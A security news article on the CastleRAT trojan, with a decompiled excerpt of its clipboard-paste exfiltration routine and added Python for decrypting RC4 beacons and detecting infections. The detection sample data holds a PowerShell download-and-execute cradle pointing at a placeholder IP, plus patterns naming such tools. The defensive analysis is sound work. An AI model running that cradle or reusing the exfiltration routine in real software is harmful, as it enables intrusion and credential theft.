Hackers Using CastleRAT Malware to Attack Windows Systems and Gain Remote Access

A new Remote Access Trojan known as CastleRAT has emerged as a growing threat to Windows systems worldwide.

First observed around March 2025, this malware enables attackers to gain complete remote control over compromised machines.

The threat comes in two main builds: a lightweight Python version and a more powerful compiled C version, with the latter offering advanced capabilities including keystroke capture, screen grabs, and persistent installation methods.

CastleRAT encrypts its command-and-control traffic with RC4 using a key hardcoded in the binary.

Once deployed, the malware collects system information such as computer name, username, machine GUID, public IP address, and product details, then transmits this data to the attacker.

The infected host receives instructions and additional tools from the C2 server, allowing the attacker to execute commands remotely.
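To make the C2 design concrete, here is an added example in Python (not CastleRAT's code and not Splunk's): a from-scratch RC4 implementation that encrypts a constructed beacon under a hypothetical hardcoded key, the decryption an analyst performs once that key has been pulled out of the binary, and the weakness a fixed key with no per-message nonce creates. Because every beacon is XORed with the same keystream, XORing two captured beacons cancels the key entirely, and a known plaintext prefix of one beacon (here the infected host's own name inside an assumed JSON layout) recovers the keystream prefix and decrypts the same prefix of any other beacon without the key. The key, the JSON field names and the beacon layout are assumptions made for this example.

```python
import json

# Hypothetical hardcoded key; the real CastleRAT key is not given on this page.
HARDCODED_KEY = b"castle-demo-key"


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Standard RC4: the key-scheduling algorithm permutes S, then the
    pseudo-random generation algorithm emits `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                    # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 is a stream cipher: encryption and decryption are the same XOR."""
    return bytes(a ^ b for a, b in zip(data, rc4_keystream(key, len(data))))


def build_beacon(computer: str, user: str, guid: str, ip: str, product: str) -> bytes:
    """Constructed beacon body carrying the fields the article lists.
    The JSON layout and field names are an assumption for this example."""
    return json.dumps({"computer": computer, "user": user, "guid": guid,
                       "ip": ip, "product": product},
                      separators=(",", ":")).encode()


def encrypt_beacon(key: bytes, plaintext: bytes) -> bytes:
    """What an infected host would send: RC4 under the fixed key, no nonce."""
    return rc4(key, plaintext)


def decrypt_beacon(key: bytes, ciphertext: bytes) -> dict:
    """What an analyst does with the key recovered from the binary."""
    return json.loads(rc4(key, ciphertext))


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def recover_prefix_without_key(captured: bytes, other: bytes, known_prefix: bytes) -> bytes:
    """Fixed key + no nonce => identical keystream for every beacon.
    Knowing the plaintext prefix of `captured` yields the keystream prefix,
    which decrypts the same prefix of `other` with no key at all."""
    keystream_prefix = xor_bytes(captured[:len(known_prefix)], known_prefix)
    return xor_bytes(other[:len(known_prefix)], keystream_prefix)


if __name__ == "__main__":
    # Two constructed beacons from two different hosts, same hardcoded key.
    p1 = build_beacon("DESKTOP-A1", "alice", "1111-2222", "198.51.100.7", "Windows 10 Pro")
    p2 = build_beacon("WS-FINANCE", "bob", "3333-4444", "203.0.113.9", "Windows 11 Pro")
    c1, c2 = encrypt_beacon(HARDCODED_KEY, p1), encrypt_beacon(HARDCODED_KEY, p2)
    print(decrypt_beacon(HARDCODED_KEY, c1)["computer"])
    # The key cancels out: c1 ^ c2 == p1 ^ p2.
    print(xor_bytes(c1, c2) == xor_bytes(p1, p2))
    # The analyst knows beacon 1 came from DESKTOP-A1 (their own incident host);
    # that alone exposes the hostname inside beacon 2.
    print(recover_prefix_without_key(c1, c2, b'{"computer":"DESKTOP-A1'))
```

The practical consequence for an analyst is that once the key is recovered from one sample, every capture of this C2 channel decrypts, and even without the key, the constant parts of the beacon (field names, a known hostname) are enough to peel off the first bytes of every other beacon.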

Splunk security researchers found that CastleRAT employs several techniques that map to the MITRE ATT&CK framework.

The malware gathers basic system details and queries free web services such as ip-api.com for the host's public IP address, which it includes in its regular beacons.

Clipboard Data Collection and Exfiltration

One notable technique involves clipboard data harvesting. CastleRAT launches multiple threads within its process, with each thread carrying out different malicious activities.

The clipboard collection thread targets users who often copy credentials or cryptocurrency addresses, making this an effective method for harvesting sensitive information like usernames, passwords, and wallet strings.

CastleRAT beacon and C2 communication flow (Source: Splunk)

The malware hijacks the clipboard and simulates paste actions to exfiltrate data stealthily. Rather than opening its own network sockets or calling the obvious networking APIs, CastleRAT writes the harvested information to the clipboard with SetClipboardData and then calls SendInput() to synthesize a Ctrl+V keystroke, so the paste takes place inside a benign-looking foreground application rather than in the malware's own process.

CastleRAT Clipboard Data Collection (Source: Splunk)

This technique reduces noisy network artifacts and blends exfiltration into ordinary user activity, complicating detection efforts.

/* Decompiler output of the clipboard-paste routine; comments added. */
if (OpenClipboard(0))                      /* decompiler showed 0i64, i.e. NULL: no owner window */
{
    EmptyClipboard();
    hMem = GlobalAlloc(0x2000u, v2 + 1);   /* v2 = length of the harvested text; +1 for the NUL */
    Dest = GlobalLock(hMem);
    strcpy(Dest, Source);                  /* Source = harvested data to be "pasted" out */
    SetClipboardData(1u, hMem);            /* 1 = CF_TEXT; the clipboard takes ownership of hMem
                                              (the malware never calls GlobalUnlock first) */
    CloseClipboard();
    pInputs[0].ki.wVk = VK_CONTROL;        /* four INPUT records: Ctrl down and 'V' down are shown; */
    pInputs[2].ki.wVk = 'V';               /* the other two are presumably the matching key-up events */
    SendInput(4u, pInputs, 40);            /* 40 = sizeof(INPUT) on x64; delivers Ctrl+V to the foreground window */
}

To detect this threat, organizations should monitor for unusual outbound connections (including beacons to public-IP lookup services such as ip-api.com), one-line PowerShell download cradles, unexpected binaries launched from user folders, and high-entropy traffic consistent with RC4 encryption on ports where plaintext or TLS would be expected.
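As an added example (not Splunk's detection content and not part of the original article), the following Python turns those monitoring points into rules run over a handful of constructed Sysmon-style records: a PowerShell download cradle, a binary executing from a user-writable folder, that binary reaching ip-api.com and then a raw port, and a benign browser TLS session that must not fire. The event shape, the paths, the addresses and the payload bytes are all assumptions built for this example; the high-entropy payload is a deterministic byte permutation standing in for RC4 ciphertext, and the TLS check is the caveat that encrypted traffic alone is not a signal.

```python
import math
import re

# Constructed telemetry in a Sysmon-like shape: id 1 = process create,
# id 3 = network connection (with an assumed captured "payload" field).
# These are sample records built for this example, not real logs.
SUSPECT_EXE = r"C:\Users\alice\AppData\Local\Temp\svchost.exe"
# Deterministic stand-in for an RC4 beacon: 7919 is odd, so this is a
# permutation of 0..255 and every byte value appears exactly once.
ENCRYPTED_LIKE = bytes((i * 7919 + 13) % 256 for i in range(256))
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://198.51.100.7/a.ps1')\""},
    {"id": 1, "image": SUSPECT_EXE, "cmdline": SUSPECT_EXE},
    {"id": 3, "image": SUSPECT_EXE, "dest_host": "ip-api.com", "dest_port": 80,
     "payload": b"GET /json HTTP/1.1\r\nHost: ip-api.com\r\n\r\n"},
    {"id": 3, "image": SUSPECT_EXE, "dest_host": "198.51.100.7", "dest_port": 4444,
     "payload": ENCRYPTED_LIKE},
    {"id": 1, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\firefox.exe"'},
    {"id": 3, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_host": "www.example.com", "dest_port": 443,
     "payload": b"\x16\x03\x01" + ENCRYPTED_LIKE},   # TLS handshake record: high entropy, benign
]

# A one-line download cradle needs a download primitive AND in-memory execution.
DOWNLOAD_PRIMITIVE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Start-BitsTransfer",
    re.IGNORECASE)
INMEM_EXEC = re.compile(r"\bIEX\b|Invoke-Expression|-enc(odedcommand)?\b", re.IGNORECASE)
# Executables running from locations signed software rarely lives in.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)\\|\\Temp\\", re.IGNORECASE)
# Public-IP lookup services the article says the RAT uses for beaconing.
IP_LOOKUP_HOSTS = {"ip-api.com"}


def is_powershell(image: str) -> bool:
    return image.lower().endswith(("powershell.exe", "pwsh.exe"))


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; 8.0 means every byte value is equally common."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def looks_encrypted(payload: bytes) -> bool:
    """High entropy with no TLS record header: the only 'sign' RC4 traffic gives,
    since RC4 adds no framing of its own. TLS is excluded to avoid flagging HTTPS."""
    if payload.startswith(b"\x16\x03"):
        return False
    return shannon_entropy(payload) > 7.0


def detect(events):
    """Return (rule, detail) tuples for every record that matches a rule."""
    alerts = []
    for ev in events:
        image = ev["image"]
        if ev["id"] == 1:
            cmd = ev.get("cmdline", "")
            if is_powershell(image) and DOWNLOAD_PRIMITIVE.search(cmd) and INMEM_EXEC.search(cmd):
                alerts.append(("powershell_download_cradle", cmd))
            if USER_WRITABLE.search(image):
                alerts.append(("binary_in_user_folder", image))
        elif ev["id"] == 3:
            host = ev["dest_host"].lower()
            where = f"{image} -> {host}:{ev['dest_port']}"
            if host in IP_LOOKUP_HOSTS:
                alerts.append(("public_ip_lookup", where))
            if USER_WRITABLE.search(image):
                alerts.append(("outbound_from_user_folder_binary", where))
            if looks_encrypted(ev.get("payload", b"")):
                alerts.append(("high_entropy_payload", where))
    return alerts


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:36} {detail}")
```

Each rule on its own is noisy (developers run binaries from Downloads, IT scripts fetch files with Invoke-WebRequest, plenty of legitimate tools ask ip-api.com for the public address); the value is in the chain, where one process from a user-writable folder trips the lookup, the raw-port connection and the entropy rule together.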
